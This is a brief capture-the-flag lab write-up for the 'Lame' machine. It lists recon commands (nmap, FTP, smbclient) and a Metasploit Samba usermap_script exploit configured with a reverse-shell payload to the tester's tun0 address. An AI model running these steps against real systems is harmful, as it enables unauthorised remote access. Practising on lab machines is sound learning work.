Lame

Recon

How many of the nmap top 1000 TCP ports are open on the remote host?

4 Ports Open

i will see the port open FTP - 21 with login Anonymous and Password Anonymous

ftp 10.10.10.3

but can't expliot ftp come i will try expliot using smb

With Passweord Protected OFF

smbclient -L 10.10.10.3

Initial Access

exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set lhost tun0
set lport 443

Root Flag

User Flag

Exploits Used

msfconsole

exploit/multi/samba/usermap_script

Tools Used

• Nmap

• smbclient

• nc